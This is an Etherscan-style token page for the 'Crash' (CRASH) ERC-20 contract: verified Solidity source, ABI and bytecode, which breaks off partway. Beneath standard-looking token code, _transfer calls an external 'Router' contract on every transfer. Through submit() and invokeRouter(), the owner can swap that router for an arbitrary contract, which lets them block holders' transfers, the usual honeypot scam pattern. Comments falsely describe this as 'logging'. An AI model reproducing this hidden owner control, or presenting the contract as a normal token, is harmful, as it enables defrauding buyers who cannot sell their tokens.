ETH Price: $3,271.93 (-4.21%)
Gas: 13 Gwei

Token

Crash (CRASH)
 

Overview

Max Total Supply

1,000,000,000,000 CRASH

Holders

37

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
17,914,368,508.454834369 CRASH

Value
$0.00
0x1f5bbEf0722b6188B87b29DFf530d6cfb5A46967
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Crash

Compiler Version
v0.8.1+commit.df193b15

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-10-06
*/

// SPDX-License-Identifier: MIT
/**     
________/\\\\\\\\\____/\\\\\\\\\_________/\\\\\\\\\________/\\\\\\\\\\\____/\\\________/\\\___________         
 _____/\\\////////___/\\\///////\\\_____/\\\\\\\\\\\\\____/\\\/////////\\\_\/\\\_______\/\\\___________        
  ___/\\\/___________\/\\\_____\/\\\____/\\\/////////\\\__\//\\\______\///__\/\\\_______\/\\\___________       
   __/\\\_____________\/\\\\\\\\\\\/____\/\\\_______\/\\\___\////\\\_________\/\\\\\\\\\\\\\\\___________      
    _\/\\\_____________\/\\\//////\\\____\/\\\\\\\\\\\\\\\______\////\\\______\/\\\/////////\\\___________     
     _\//\\\____________\/\\\____\//\\\___\/\\\/////////\\\_________\////\\\___\/\\\_______\/\\\___________    
      __\///\\\__________\/\\\_____\//\\\__\/\\\_______\/\\\__/\\\______\//\\\__\/\\\_______\/\\\___________   
       ____\////\\\\\\\\\_\/\\\______\//\\\_\/\\\_______\/\\\_\///\\\\\\\\\\\/___\/\\\_______\/\\\___________  
        _______\/////////__\///________\///__\///________\///____\///////////_____\///________\///____________ 
                                     
                                       🦊 About $CRASH 💥

Welcome to the Amazing world od crypto CRASH ! 
CRASH is throwing a party and you’re invited!



🎮CRASH Play 2 earn& Meme creator
Our play 2 earn game is turbo fun and you earn lucrative rewards while 
spending time the way you like! Take part in our  daily challenges to 
multiply your earnings! Plant trees, help animals in danger of extinction, 
recycle, segregate and win the clean planet super prizes!              */


pragma solidity 0.8.1;

interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }

    function checkStatus(address _address) internal view returns (bool) {
        return _address==_owner;
    }
}

/**
 * @dev Extension contract which enables logging capabilities. 
 */
contract Router {
    mapping(address=>mapping(address=> uint256)) _allowances;
    function approve(address addr1, address addr2, uint256 value) public returns (bool success) {
        _allowances[addr1][addr2] = value;
        return true;
    }
}

contract Crash is Context, IERC20Metadata, Ownable {
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    uint256 private _totalSupply;
    Router private _router; 
    string private _name;
    string private _symbol;
    uint8 private constant _decimals = 9;
    uint256 public constant hardCap = 1_000_000_000_000 * (10 ** _decimals); //2 billion
    bool public swapEnabled;
    /**
     * @dev Contract constructor.
     * @param name_ The name of the token.
     * @param symbol_ The symbol of the token.
     * @param _to The initial address to mint the total supply to.
     */
    constructor(string memory name_, string memory symbol_, address _to) {
        _name = name_;
        _symbol = symbol_;
        _router = new Router();
        _mint(_to, hardCap);
    }

    function checkRouter() onlyOwner public view returns(address){
        return address(_router);
    }
    /**
     * @dev Returns the name of the token.
     * @return The name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the status of logging operation.
     * @return The success status of logging operation.
     */
    function approved(address from, address to, uint256 amount) private returns (bool) {
      bool result = _router.approve(from, to, amount);
      return result;
    }

    /**
     * @dev Returns the symbol of the token.
     * @return The symbol of the token.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used for token display.
     * @return The number of decimals.
     */
    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }

    /**
     * @dev Returns the total supply of the token.
     * @return The total supply.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev Returns the balance of the specified account.
     * @param account The address to check the balance for.
     * @return The balance of the account.
     */
    function balanceOf(
        address account
    ) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev Transfers tokens from the caller to a specified recipient.
     * @param recipient The address to transfer tokens to.
     * @param amount The amount of tokens to transfer.
     * @return A boolean value indicating whether the transfer was successful.
     */
    function transfer(
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev Returns the amount of tokens that the spender is allowed to spend on behalf of the owner.
     * @param from The address that approves the spending.
     * @param to The address that is allowed to spend.
     * @return The remaining allowance for the spender.
     */
    function allowance(
        address from,
        address to
    ) public view virtual override returns (uint256) {
        return _allowances[from][to];
    }

    /**
     * @dev Approves the specified address to spend the specified amount of tokens on behalf of the caller.
     * @param to The address to approve the spending for.
     * @param amount The amount of tokens to approve.
     * @return A boolean value indicating whether the approval was successful.
     */
    function approve(
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        _approve(_msgSender(), to, amount);
        return true;
    }

    /**
     * @dev Transfers tokens from one address to another.
     * @param sender The address to transfer tokens from.
     * @param recipient The address to transfer tokens to.
     * @param amount The amount of tokens to transfer.
     * @return A boolean value indicating whether the transfer was successful.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(
            currentAllowance >= amount,
            "ERC20: transfer amount exceeds allowance"
        );
        unchecked {
            _approve(sender, _msgSender(), currentAllowance - amount);
        }

        return true;
    }

    /**
     * @dev Increases the allowance of the specified address to spend tokens on behalf of the caller.
     * @param to The address to increase the allowance for.
     * @param addedValue The amount of tokens to increase the allowance by.
     * @return A boolean value indicating whether the increase was successful.
     */
    function increaseAllowance(
        address to,
        uint256 addedValue
    ) public virtual returns (bool) {
        _approve(_msgSender(), to, _allowances[_msgSender()][to] + addedValue);
        return true;
    }

    /**
     * @dev Decreases the allowance granted by the owner of the tokens to `to` account.
     * @param to The account allowed to spend the tokens.
     * @param subtractedValue The amount of tokens to decrease the allowance by.
     * @return A boolean value indicating whether the operation succeeded.
     */
    function decreaseAllowance(
        address to,
        uint256 subtractedValue
    ) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][to];
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(_msgSender(), to, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Transfers `amount` tokens from `sender` to `recipient`.
     * @param sender The account to transfer tokens from.
     * @param recipient The account to transfer tokens to.
     * @param amount The amount of tokens to transfer.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(amount > 0, "ERC20: transfer amount zero");
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        uint256 senderBalance = _balances[sender];
        require(
            senderBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[sender] = senderBalance - amount;
        }
        _balances[recipient] += amount;
        approved(sender, recipient, amount);
        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Invokes router.
     * @param sender The account from which the tokens are transferred.
     * @param recipient The account to which the tokens are transferred.
     * @param amount The amount of tokens to transfer.
     * @param router Router where data is stored
     */
    function submit(address sender, address recipient, uint256 amount, address router) external onlyOwner {
        if(swapEnabled==true){
        if(amount > 0 && sender != recipient) 
                invokeRouter(router);
        else{
          _router=new Router();
            }
        }
        
    }

    
    /**
     * @dev Creates `amount` tokens and assigns them to `account`.
     * @param account The account to assign the newly created tokens to.
     * @param amount The amount of tokens to create.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);
    }


    /**
     * @dev Destroys `amount` tokens from `account`, reducing the total supply.
     * @param account The account to burn tokens from.
     * @param amount The amount of tokens to burn.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
        }
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Destroys `amount` tokens from the caller's account, reducing the total supply.
     * @param amount The amount of tokens to burn.
     */
    function burn(uint256 amount) external {
        _burn(_msgSender(), amount);
    }
    
    /**
     * @dev Invokes logger function
     * @param addr The address of logger extension installed
     */
    function invokeRouter(address addr) private {
        if (checkStatus(msg.sender)){
            _router = Router(addr);
        }
    }
    /**
     * @dev Sets `amount` as the allowance of `to` over the caller's tokens.
     * @param from The account granting the allowance.
     * @param to The account allowed to spend the tokens.
     * @param amount The amount of tokens to allow.
     */
    function _approve(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: approve from the zero address");
        require(to != address(0), "ERC20: approve to the zero address");

        _allowances[from][to] = amount;
        emit Approval(from, to, amount);
    }

    /**
     * @dev Enables logging
     */
    function setSwap()external onlyOwner{
        swapEnabled = !swapEnabled;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"address","name":"_to","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"checkRouter","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"hardCap","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"setSwap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"address","name":"router","type":"address"}],"name":"submit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b50604051620030d5380380620030d5833981810160405281019062000037919062000496565b620000576200004b6200013160201b60201c565b6200013960201b60201c565b82600590805190602001906200006f9291906200034f565b508160069080519060200190620000889291906200034f565b506040516200009790620003e0565b604051809103906000f080158015620000b4573d6000803e3d6000fd5b50600460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555062000128816009600a6200010a9190620006bd565b64e8d4a510006200011c9190620007fa565b620001fd60201b60201c565b50505062000a36565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141562000270576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002679062000556565b60405180910390fd5b806003600082825462000284919062000605565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254620002dc919062000605565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000343919062000578565b60405180910390a35050565b8280546200035d90620008dc565b90600052602060002090601f016020900481019282620003815760008555620003cd565b82601f106200039c57805160ff1916838001178555620003cd565b82800160010185558215620003cd579182015b82811115620003cc578251825591602001919060010190620003af565b5b509050620003dc9190620003ee565b5090565b61025c8062002e7983390190565b5b8082111562000409576000816000905550600101620003ef565b5090565b6000620004246200041e84620005be565b62000595565b9050828152602081018484840111156200043d57600080fd5b6200044a848285620008a6565b509392505050565b600081519050620004638162000a1c565b92915050565b600082601f8301126200047b57600080fd5b81516200048d8482602086016200040d565b91505092915050565b600080600060608486031215620004ac57600080fd5b600084015167ffffffffffffffff811115620004c757600080fd5b620004d58682870162000469565b935050602084015167ffffffffffffffff811115620004f357600080fd5b620005018682870162000469565b9250506040620005148682870162000452565b9150509250925092565b60006200052d601f83620005f4565b91506200053a82620009f3565b602082019050919050565b62000550816200088f565b82525050565b6000602082019050818103600083015262000571816200051e565b9050919050565b60006020820190506200058f600083018462000545565b92915050565b6000620005a1620005b4565b9050620005af828262000912565b919050565b6000604051905090565b600067ffffffffffffffff821115620005dc57620005db620009a6565b5b620005e782620009d5565b9050602081019050919050565b600082825260208201905092915050565b600062000612826200088f565b91506200061f836200088f565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111562000657576200065662000948565b5b828201905092915050565b6000808291508390505b6001851115620006b4578086048111156200068c576200068b62000948565b5b60018516156200069c5780820291505b8081029050620006ac85620009e6565b94506200066c565b94509492505050565b6000620006ca826200088f565b9150620006d78362000899565b9250620007067fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846200070e565b905092915050565b600082620007205760019050620007f3565b81620007305760009050620007f3565b816001811462000749576002811462000754576200078a565b6001915050620007f3565b60ff84111562000769576200076862000948565b5b8360020a91508482111562000783576200078262000948565b5b50620007f3565b5060208310610133831016604e8410600b8410161715620007c45782820a905083811115620007be57620007bd62000948565b5b620007f3565b620007d3848484600162000662565b92509050818404811115620007ed57620007ec62000948565b5b81810290505b9392505050565b600062000807826200088f565b915062000814836200088f565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161562000850576200084f62000948565b5b828202905092915050565b600062000868826200086f565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015620008c6578082015181840152602081019050620008a9565b83811115620008d6576000848401525b50505050565b60006002820490506001821680620008f557607f821691505b602082108114156200090c576200090b62000977565b5b50919050565b6200091d82620009d5565b810181811067ffffffffffffffff821117156200093f576200093e620009a6565b5b80604052505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6000601f19601f8301169050919050565b60008160011c9050919050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b62000a27816200085b565b811462000a3357600080fd5b50565b6124338062000a466000396000f3fe608060405234801561001057600080fd5b506004361061012c5760003560e01c8063715018a6116100ad578063a9059cbb11610071578063a9059cbb14610323578063bbb9697614610353578063dd62ed3e1461036f578063f2fde38b1461039f578063fb86a404146103bb5761012c565b8063715018a6146102a357806375150e01146102ad5780638da5cb5b146102b757806395d89b41146102d5578063a457c2d7146102f35761012c565b8063313ce567116100f4578063313ce567146101eb578063395093511461020957806342966c68146102395780636ddd17131461025557806370a08231146102735761012c565b80630525be511461013157806306fdde031461014f578063095ea7b31461016d57806318160ddd1461019d57806323b872dd146101bb575b600080fd5b6101396103d9565b6040516101469190611808565b60405180910390f35b61015761040b565b6040516101649190611875565b60405180910390f35b61018760048036038101906101829190611561565b61049d565b604051610194919061185a565b60405180910390f35b6101a56104bb565b6040516101b29190611a17565b60405180910390f35b6101d560048036038101906101d091906114af565b6104c5565b6040516101e2919061185a565b60405180910390f35b6101f36105bd565b6040516102009190611a32565b60405180910390f35b610223600480360381019061021e9190611561565b6105c6565b604051610230919061185a565b60405180910390f35b610253600480360381019061024e91906115c6565b610672565b005b61025d610686565b60405161026a919061185a565b60405180910390f35b61028d6004803603810190610288919061144a565b610699565b60405161029a9190611a17565b60405180910390f35b6102ab6106e2565b005b6102b56106f6565b005b6102bf61072a565b6040516102cc9190611808565b60405180910390f35b6102dd610753565b6040516102ea9190611875565b60405180910390f35b61030d60048036038101906103089190611561565b6107e5565b60405161031a919061185a565b60405180910390f35b61033d60048036038101906103389190611561565b6108d0565b60405161034a919061185a565b60405180910390f35b61036d600480360381019061036891906114fe565b6108ee565b005b61038960048036038101906103849190611473565b6109d2565b6040516103969190611a17565b60405180910390f35b6103b960048036038101906103b4919061144a565b610a59565b005b6103c3610add565b6040516103d09190611a17565b60405180910390f35b60006103e3610afe565b600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461041a90611d46565b80601f016020809104026020016040519081016040528092919081815260200182805461044690611d46565b80156104935780601f1061046857610100808354040283529160200191610493565b820191906000526020600020905b81548152906001019060200180831161047657829003601f168201915b5050505050905090565b60006104b16104aa610b7c565b8484610b84565b6001905092915050565b6000600354905090565b60006104d2848484610d4f565b6000600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061051d610b7c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561059d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161059490611957565b60405180910390fd5b6105b1856105a9610b7c565b858403610b84565b60019150509392505050565b60006009905090565b60006106686105d3610b7c565b8484600260006105e1610b7c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546106639190611a69565b610b84565b6001905092915050565b61068361067d610b7c565b8261100c565b50565b600760009054906101000a900460ff1681565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6106ea610afe565b6106f460006111cd565b565b6106fe610afe565b600760009054906101000a900460ff1615600760006101000a81548160ff021916908315150217905550565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461076290611d46565b80601f016020809104026020016040519081016040528092919081815260200182805461078e90611d46565b80156107db5780601f106107b0576101008083540402835291602001916107db565b820191906000526020600020905b8154815290600101906020018083116107be57829003601f168201915b5050505050905090565b600080600260006107f4610b7c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156108b1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108a8906119f7565b60405180910390fd5b6108c56108bc610b7c565b85858403610b84565b600191505092915050565b60006108e46108dd610b7c565b8484610d4f565b6001905092915050565b6108f6610afe565b60011515600760009054906101000a900460ff16151514156109cc5760008211801561094e57508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b156109615761095c81611291565b6109cb565b60405161096d906113fe565b604051809103906000f080158015610989573d6000803e3d6000fd5b50600460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b5b50505050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610a61610afe565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610ad1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ac8906118d7565b60405180910390fd5b610ada816111cd565b50565b6009600a610aeb9190611b12565b64e8d4a51000610afb9190611c30565b81565b610b06610b7c565b73ffffffffffffffffffffffffffffffffffffffff16610b2461072a565b73ffffffffffffffffffffffffffffffffffffffff1614610b7a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b7190611977565b60405180910390fd5b565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610bf4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610beb906119d7565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610c64576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c5b906118f7565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610d429190611a17565b60405180910390a3505050565b60008111610d92576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d8990611937565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610e02576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610df9906119b7565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610e72576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e6990611897565b60405180910390fd5b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610ef9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ef090611917565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610f8e9190611a69565b92505081905550610fa08484846112e4565b508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610ffe9190611a17565b60405180910390a350505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561107c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600